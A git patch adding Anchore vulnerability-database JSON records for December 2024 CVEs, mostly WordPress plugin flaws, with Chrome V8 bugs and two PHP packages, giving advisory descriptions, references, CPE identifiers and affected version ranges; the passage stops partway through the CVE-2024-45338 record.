From c8af25628af4a788b0d61a4c1a290276949fb509 Mon Sep 17 00:00:00 2001 From: Weston Steimel Date: Thu, 19 Dec 2024 09:30:13 +0000 Subject: [PATCH] updates 2024-12-19 Signed-off-by: Weston Steimel --- data/anchore/2024/CVE-2024-10892.json | 44 ++++++++++++++++ data/anchore/2024/CVE-2024-11254.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-11291.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-11295.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12061.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12259.json | 47 +++++++++++++++++ data/anchore/2024/CVE-2024-12432.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-12596.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-12692.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12693.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12694.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-12695.json | 41 +++++++++++++++ data/anchore/2024/CVE-2024-21546.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-21547.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-45338.json | 73 +++++++++++++++++++++++++++ data/anchore/2024/CVE-2024-49363.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52579.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52590.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52591.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52592.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-52593.json | 43 ++++++++++++++++ data/anchore/2024/CVE-2024-53269.json | 56 ++++++++++++++++++++ data/anchore/2024/CVE-2024-53270.json | 62 +++++++++++++++++++++++ data/anchore/2024/CVE-2024-53271.json | 50 ++++++++++++++++++ data/anchore/2024/CVE-2024-54265.json | 9 +++- data/anchore/2024/CVE-2024-54266.json | 9 +++- data/anchore/2024/CVE-2024-54267.json | 9 +++- data/anchore/2024/CVE-2024-54268.json | 9 +++- data/anchore/2024/CVE-2024-54289.json | 7 ++- data/anchore/2024/CVE-2024-54298.json | 9 +++- data/anchore/2024/CVE-2024-54323.json | 9 +++- data/anchore/2024/CVE-2024-54326.json | 9 +++- data/anchore/2024/CVE-2024-55603.json | 50 ++++++++++++++++++ data/anchore/2024/CVE-2024-55952.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-55953.json | 45 +++++++++++++++++ data/anchore/2024/CVE-2024-55985.json | 44 ++++++++++++++++ data/anchore/2024/CVE-2024-56047.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56048.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56049.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56050.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56051.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56052.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56053.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56054.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56055.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56057.json | 46 +++++++++++++++++ data/anchore/2024/CVE-2024-56128.json | 53 +++++++++++++++++++ data/anchore/2024/CVE-2024-56145.json | 51 +++++++++++++++++++ 48 files changed, 1921 insertions(+), 15 deletions(-) create mode 100644 data/anchore/2024/CVE-2024-10892.json create mode 100644 data/anchore/2024/CVE-2024-11254.json create mode 100644 data/anchore/2024/CVE-2024-11291.json create mode 100644 data/anchore/2024/CVE-2024-11295.json create mode 100644 data/anchore/2024/CVE-2024-12061.json create mode 100644 data/anchore/2024/CVE-2024-12259.json create mode 100644 data/anchore/2024/CVE-2024-12432.json create mode 100644 data/anchore/2024/CVE-2024-12596.json create mode 100644 data/anchore/2024/CVE-2024-12692.json create mode 100644 data/anchore/2024/CVE-2024-12693.json create mode 100644 data/anchore/2024/CVE-2024-12694.json create mode 100644 data/anchore/2024/CVE-2024-12695.json create mode 100644 data/anchore/2024/CVE-2024-21546.json create mode 100644 data/anchore/2024/CVE-2024-21547.json create mode 100644 data/anchore/2024/CVE-2024-45338.json create mode 100644 data/anchore/2024/CVE-2024-49363.json create mode 100644 data/anchore/2024/CVE-2024-52579.json create mode 100644 data/anchore/2024/CVE-2024-52590.json create mode 100644 data/anchore/2024/CVE-2024-52591.json create mode 100644 data/anchore/2024/CVE-2024-52592.json create mode 100644 data/anchore/2024/CVE-2024-52593.json create mode 100644 data/anchore/2024/CVE-2024-53269.json create mode 100644 data/anchore/2024/CVE-2024-53270.json create mode 100644 data/anchore/2024/CVE-2024-53271.json create mode 100644 data/anchore/2024/CVE-2024-55603.json create mode 100644 data/anchore/2024/CVE-2024-55952.json create mode 100644 data/anchore/2024/CVE-2024-55953.json create mode 100644 data/anchore/2024/CVE-2024-55985.json create mode 100644 data/anchore/2024/CVE-2024-56047.json create mode 100644 data/anchore/2024/CVE-2024-56048.json create mode 100644 data/anchore/2024/CVE-2024-56049.json create mode 100644 data/anchore/2024/CVE-2024-56050.json create mode 100644 data/anchore/2024/CVE-2024-56051.json create mode 100644 data/anchore/2024/CVE-2024-56052.json create mode 100644 data/anchore/2024/CVE-2024-56053.json create mode 100644 data/anchore/2024/CVE-2024-56054.json create mode 100644 data/anchore/2024/CVE-2024-56055.json create mode 100644 data/anchore/2024/CVE-2024-56057.json create mode 100644 data/anchore/2024/CVE-2024-56128.json create mode 100644 data/anchore/2024/CVE-2024-56145.json diff --git a/data/anchore/2024/CVE-2024-10892.json b/data/anchore/2024/CVE-2024-10892.json new file mode 100644 index 00000000..96c65e6b --- /dev/null +++ b/data/anchore/2024/CVE-2024-10892.json @@ -0,0 +1,44 @@ +{ + "additionalMetadata": { + "cna": "wpscan", + "cveId": "CVE-2024-10892", + "description": "The Cost Calculator Builder WordPress plugin before 3.2.43 does not have CSRF checks in some AJAX actions, which could allow attackers to make logged in users perform unwanted actions via CSRF attacks.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://wpscan.com/vulnerability/ff1f5b84-a8cf-4574-a713-53d35739c6cb/" + ], + "upstream": { + "datePublished": "2024-12-18T06:00:16.137Z", + "dateReserved": "2024-11-05T18:26:45.843Z", + "dateUpdated": "2024-12-18T15:10:31.241Z", + "digest": "700fe76bcb6d55b03d99e6fc03f0917852942b346a69f9827a3c408f48140b48" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:stylemixthemes:cost_calculator_builder:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "cost-calculator-builder", + "packageType": "wordpress-plugin", + "product": "Cost Calculator Builder", + "repo": "https://plugins.svn.wordpress.org/cost-calculator-builder", + "vendor": "stylemixthemes", + "versions": [ + { + "lessThan": "3.2.43", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-11254.json b/data/anchore/2024/CVE-2024-11254.json new file mode 100644 index 00000000..a7c3caf8 --- /dev/null +++ b/data/anchore/2024/CVE-2024-11254.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11254", + "description": "The AMP for WP – Accelerated Mobile Pages plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the disqus_name parameter in all versions up to, and including, 1.1.1 due to insufficient input validation. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/browser/accelerated-mobile-pages/tags/1.0.93/includes/disqus.html?rev=3024147#L34", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/5da82149-c827-4574-8269-b2b798edca59?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:05.525Z", + "dateReserved": "2024-11-15T10:03:40.779Z", + "dateUpdated": "2024-12-18T16:35:04.395Z", + "digest": "beb572e898580c52c899b149f913c269b1bf8fe885ee055e13688927b8136f56" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:ampforwp:accelerated_mobile_pages:*:*:*:*:*:wordpress:*:*", + "cpe:2.3:a:magazine3:amp_for_wp:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "accelerated-mobile-pages", + "packageType": "wordpress-plugin", + "product": "AMP for WP – Accelerated Mobile Pages", + "repo": "https://plugins.svn.wordpress.org/accelerated-mobile-pages", + "vendor": "mohammed_kaludi", + "versions": [ + { + "lessThan": "1.1.2", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-11291.json b/data/anchore/2024/CVE-2024-11291.json new file mode 100644 index 00000000..10863adc --- /dev/null +++ b/data/anchore/2024/CVE-2024-11291.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11291", + "description": "The Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 2.13.4 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3206206/paid-member-subscriptions", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/e207f1a3-2ca5-46d1-91a9-89652451266c?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T11:09:31.646Z", + "dateReserved": "2024-11-15T21:37:54.832Z", + "dateUpdated": "2024-12-18T16:29:54.185Z", + "digest": "80d42db5428bd90c7210fc77c735642e09f9101659e8566d2fb9bea37c6221b8" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:cozmoslabs:membership_\\&_content_restriction_-_paid_member_subscriptions:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "paid-member-subscriptions", + "packageType": "wordpress-plugin", + "product": "Paid Membership Subscriptions – Effortless Memberships, Recurring Payments & Content Restriction", + "repo": "https://plugins.svn.wordpress.org/paid-member-subscriptions", + "vendor": "madalinungureanu", + "versions": [ + { + "lessThan": "2.13.5", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-11295.json b/data/anchore/2024/CVE-2024-11295.json new file mode 100644 index 00000000..b059fe86 --- /dev/null +++ b/data/anchore/2024/CVE-2024-11295.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-11295", + "description": "The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.29 via the WordPress core search feature. This makes it possible for unauthenticated attackers to extract sensitive data from posts that have been restricted to higher-level roles such as logged-in users.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3205648/simple-page-access-restriction", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/ed92806e-5d75-4a23-a588-821e9ada1b32?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T07:02:46.168Z", + "dateReserved": "2024-11-15T23:54:25.258Z", + "dateUpdated": "2024-12-18T16:33:27.786Z", + "digest": "b2dbbc3642edb147de02aa0790a9b92c951ed47a6f373f6c38e0827f333abe6c" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:pluginsandsnippets:simple_page_access_restriction:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "simple-page-access-restriction", + "packageType": "wordpress-plugin", + "product": "Simple Page Access Restriction", + "repo": "https://plugins.svn.wordpress.org/simple-page-access-restriction", + "vendor": "pluginsandsnippets", + "versions": [ + { + "lessThan": "1.0.30", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12061.json b/data/anchore/2024/CVE-2024-12061.json new file mode 100644 index 00000000..6ced5a91 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12061.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12061", + "description": "The Events Addon for Elementor plugin for WordPress is vulnerable to Information Exposure in all versions up to, and including, 2.2.3 via the naevents_elementor_template shortcode due to insufficient restrictions on which posts can be included. This makes it possible for authenticated attackers, with Contributor-level access and above, to extract data from private or draft posts created by Elementor that they should not have access to.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208546%40events-addon-for-elementor&new=3208546%40events-addon-for-elementor&sfp_email=&sfph_mail=", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/f59d9d8a-467a-4920-963a-da45f1f4462f?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:07.346Z", + "dateReserved": "2024-12-02T20:40:21.531Z", + "dateUpdated": "2024-12-18T16:33:59.336Z", + "digest": "d6d2201b0a475b98bec6bc22ce4766d82dea737618099ca04f29d44d654f62c6" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:nicheaddons:events_addon_for_elementor:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "events-addon-for-elementor", + "packageType": "wordpress-plugin", + "product": "Events Addon for Elementor", + "repo": "https://plugins.svn.wordpress.org/events-addon-for-elementor", + "vendor": "nicheaddons", + "versions": [ + { + "lessThan": "2.2.4", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12259.json b/data/anchore/2024/CVE-2024-12259.json new file mode 100644 index 00000000..564c4838 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12259.json @@ -0,0 +1,47 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12259", + "description": "The CRM WordPress Plugin – RepairBuddy plugin for WordPress is vulnerable to privilege escalation via account takeover in all versions up to, and including, 3.8120. This is due to the plugin not properly validating a user's identity prior to updating their email through the wc_update_user_data AJAX action. This makes it possible for authenticated attackers, with subscriber-level access and above, to change arbitrary user's email addresses, including administrators, and leverage that to reset the user's password and gain access to their account.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3204501%40computer-repair-shop&new=3204501%40computer-repair-shop&sfp_email=&sfph_mail=", + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3206568%40computer-repair-shop&new=3206568%40computer-repair-shop&sfp_email=&sfph_mail=#file548", + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208270%40computer-repair-shop&new=3208270%40computer-repair-shop&sfp_email=&sfph_mail=", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/80997d2f-3e16-48f6-969b-58844cb83d53?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:05.906Z", + "dateReserved": "2024-12-05T16:30:27.926Z", + "dateUpdated": "2024-12-18T16:34:53.057Z", + "digest": "f91e0fa51e7614fe2a4b1ea446545a2f0430fead300e1f15946bd867e0a86eff" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:webfulcreations:computer_repair_shop:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "computer-repair-shop", + "packageType": "wordpress-plugin", + "product": "CRM WordPress Plugin – RepairBuddy", + "repo": "https://plugins.svn.wordpress.org/computer-repair-shop", + "vendor": "sweetdaisy86", + "versions": [ + { + "lessThan": "3.8122", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12432.json b/data/anchore/2024/CVE-2024-12432.json new file mode 100644 index 00000000..a211bf84 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12432.json @@ -0,0 +1,45 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12432", + "description": "The WPC Shop as a Customer for WooCommerce plugin for WordPress is vulnerable to account takeover and privilege escalation in all versions up to, and including, 1.2.8. This is due to the 'generate_key' function not producing a sufficiently random value. This makes it possible for authenticated attackers, with Subscriber-level access and above, to log in as site administrators, granted they have triggered the ajax_login() function which generates a unique key that can be used to log in.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3208130%40wpc-shop-as-customer&new=3208130%40wpc-shop-as-customer&sfp_email=&sfph_mail=", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/048625e8-10b7-418d-a13b-329f1d7e0171?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:00.850Z", + "dateReserved": "2024-12-10T17:11:11.238Z", + "dateUpdated": "2024-12-18T16:35:53.912Z", + "digest": "b98d5c7bd9e5c0609f97ec1cfc0dbedd5de4308ea3403df8d7467987c04defd2" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:wpclever:wpc_shop_as_a_customer_for_woocommerce:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "wpc-shop-as-customer", + "packageType": "wordpress-plugin", + "product": "WPC Shop as a Customer for WooCommerce", + "repo": "https://plugins.svn.wordpress.org/wpc-shop-as-customer", + "vendor": "wpclever", + "versions": [ + { + "lessThan": "1.2.9", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12596.json b/data/anchore/2024/CVE-2024-12596.json new file mode 100644 index 00000000..9d697915 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12596.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "wordfence", + "cveId": "CVE-2024-12596", + "description": "The LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes plugin for WordPress is vulnerable to arbitrary post deletion due to a missing capability check on the 'llms_delete_cert' action in all versions up to, and including, 7.8.5. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary posts.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://plugins.trac.wordpress.org/changeset/3208662/lifterlms/trunk/includes/abstracts/llms-abstract-controller-user-engagements.php", + "https://plugins.trac.wordpress.org/changeset/3208662/lifterlms/trunk/includes/controllers/class.llms.controller.certificates.php", + "https://www.wordfence.com/threat-intel/vulnerabilities/id/8e75a03b-7552-4228-a4d0-13c78d20f6d5?source=cve" + ], + "upstream": { + "datePublished": "2024-12-18T03:22:06.256Z", + "dateReserved": "2024-12-12T22:14:08.110Z", + "dateUpdated": "2024-12-18T16:34:43.867Z", + "digest": "9cb9f3bc8b21efdda84c1a41d383e0125061f2051d407e49bf20c0c13499de24" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://wordpress.org/plugins", + "cpes": [ + "cpe:2.3:a:lifterlms:lifterlms:*:*:*:*:*:wordpress:*:*" + ], + "packageName": "lifterlms", + "packageType": "wordpress-plugin", + "product": "LifterLMS – WP LMS for eLearning, Online Courses, & Quizzes", + "repo": "https://plugins.svn.wordpress.org/lifterlms", + "vendor": "chrisbadgett", + "versions": [ + { + "lessThan": "7.8.6", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12692.json b/data/anchore/2024/CVE-2024-12692.json new file mode 100644 index 00000000..8e066edd --- /dev/null +++ b/data/anchore/2024/CVE-2024-12692.json @@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12692", + "description": "Type Confusion in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/382291459" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.456Z", + "dateReserved": "2024-12-16T21:02:50.722Z", + "dateUpdated": "2024-12-18T21:42:56.456Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12693.json b/data/anchore/2024/CVE-2024-12693.json new file mode 100644 index 00000000..a77250f0 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12693.json @@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12693", + "description": "Out of bounds memory access in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/382190919" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.781Z", + "dateReserved": "2024-12-16T21:02:50.941Z", + "dateUpdated": "2024-12-18T21:42:56.781Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12694.json b/data/anchore/2024/CVE-2024-12694.json new file mode 100644 index 00000000..1f19b7f9 --- /dev/null +++ b/data/anchore/2024/CVE-2024-12694.json @@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12694", + "description": "Use after free in Compositing in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to potentially exploit heap corruption via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/368222741" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:56.986Z", + "dateReserved": "2024-12-16T21:02:51.195Z", + "dateUpdated": "2024-12-18T21:42:56.986Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-12695.json b/data/anchore/2024/CVE-2024-12695.json new file mode 100644 index 00000000..d749342e --- /dev/null +++ b/data/anchore/2024/CVE-2024-12695.json @@ -0,0 +1,41 @@ +{ + "additionalMetadata": { + "cna": "chrome", + "cveId": "CVE-2024-12695", + "description": "Out of bounds write in V8 in Google Chrome prior to 131.0.6778.204 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High)", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://chromereleases.googleblog.com/2024/12/stable-channel-update-for-desktop_18.html", + "https://issues.chromium.org/issues/383647255" + ], + "upstream": { + "datePublished": "2024-12-18T21:42:57.172Z", + "dateReserved": "2024-12-16T21:02:51.317Z", + "dateUpdated": "2024-12-18T21:42:57.172Z", + "digest": "894d81daddd9073ea4982b4bd66fa06044a00d617176f8ac175a8f9fc8b83e60" + } + }, + "adp": { + "affected": [ + { + "cpes": [ + "cpe:2.3:a:google:chrome:*:*:*:*:*:*:*:*" + ], + "product": "Chrome", + "vendor": "Google", + "versions": [ + { + "lessThan": "131.0.6778.204", + "status": "affected", + "version": "0", + "versionType": "custom" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-21546.json b/data/anchore/2024/CVE-2024-21546.json new file mode 100644 index 00000000..bd726d32 --- /dev/null +++ b/data/anchore/2024/CVE-2024-21546.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "snyk", + "cveId": "CVE-2024-21546", + "description": "Versions of the package unisharp/laravel-filemanager before 2.9.1 are vulnerable to Remote Code Execution (RCE) through using a valid mimetype and inserting the . character after the php file extension. This allows the attacker to execute malicious code.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://gist.github.com/ImHades101/338a06816ef97262ba632af9c78b78ca", + "https://github.com/UniSharp/laravel-filemanager/commit/8170760c0ae316d77b9363cd4c76ab68d3f63f0b", + "https://security.snyk.io/vuln/SNYK-PHP-UNISHARPLARAVELFILEMANAGER-7210316" + ], + "upstream": { + "datePublished": "2024-12-18T06:06:02.529Z", + "dateReserved": "2023-12-22T12:33:20.128Z", + "dateUpdated": "2024-12-18T06:06:02.529Z", + "digest": "132e8191004638dd59caabac2de03a2940657c27a7a0ea0fc48d766a7501001f" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://packagist.org", + "cpes": [ + "cpe:2.3:a:unisharp:laravel-filemanager:*:*:*:*:*:php:*:*" + ], + "packageName": "unisharp/laravel-filemanager", + "packageType": "php-composer", + "product": "unisharp/laravel-filemanager", + "repo": "https://github.com/UniSharp/laravel-filemanager", + "vendor": "unisharp", + "versions": [ + { + "lessThan": "2.9.1", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-21547.json b/data/anchore/2024/CVE-2024-21547.json new file mode 100644 index 00000000..f0fb71de --- /dev/null +++ b/data/anchore/2024/CVE-2024-21547.json @@ -0,0 +1,46 @@ +{ + "additionalMetadata": { + "cna": "snyk", + "cveId": "CVE-2024-21547", + "description": "Versions of the package spatie/browsershot before 5.0.2 are vulnerable to Directory Traversal due to URI normalisation in the browser where the file:// check can be bypassed with file:\\\\. An attacker could read any file on the server by exploiting the normalization of \\ into /.", + "reason": "Added CPE configurations because not yet analyzed by NVD.", + "references": [ + "https://gist.github.com/chuajianshen/baa71db588cfc038fb5d65624a47be81", + "https://github.com/spatie/browsershot/commit/dfc3635b83dd980e5c39f8f8c73e87723b99ca01", + "https://security.snyk.io/vuln/SNYK-PHP-SPATIEBROWSERSHOT-8501858" + ], + "upstream": { + "datePublished": "2024-12-18T06:06:04.591Z", + "dateReserved": "2023-12-22T12:33:20.128Z", + "dateUpdated": "2024-12-18T14:44:23.335Z", + "digest": "907c053b4d27cb919fa9a9914ca3359d721e96915d10744fa27c52d1bbf9857e" + } + }, + "adp": { + "affected": [ + { + "collectionURL": "https://packagist.org", + "cpes": [ + "cpe:2.3:a:spatie:browsershot:*:*:*:*:*:php:*:*" + ], + "packageName": "spatie/browsershot", + "packageType": "php-composer", + "product": "spatie/browsershot", + "repo": "https://github.com/spatie/browsershot", + "vendor": "spatio", + "versions": [ + { + "lessThan": "5.0.2", + "status": "affected", + "version": "0", + "versionType": "semver" + } + ] + } + ], + "providerMetadata": { + "orgId": "00000000-0000-4000-8000-000000000000", + "shortName": "anchoreadp" + } + } +} \ No newline at end of file diff --git a/data/anchore/2024/CVE-2024-45338.json b/data/anchore/2024/CVE-2024-45338.json new file mode 100644 index 00000000..41d7203b --- /dev/null +++ b/data/anchore/2024/CVE-2024-45338.json @@ -0,0 +1,73 @@ +{ + "additionalMetadata": { + "cna": "go", + "cveId": "CVE-2024-45338", + "description": "An attacker can craft an input to the 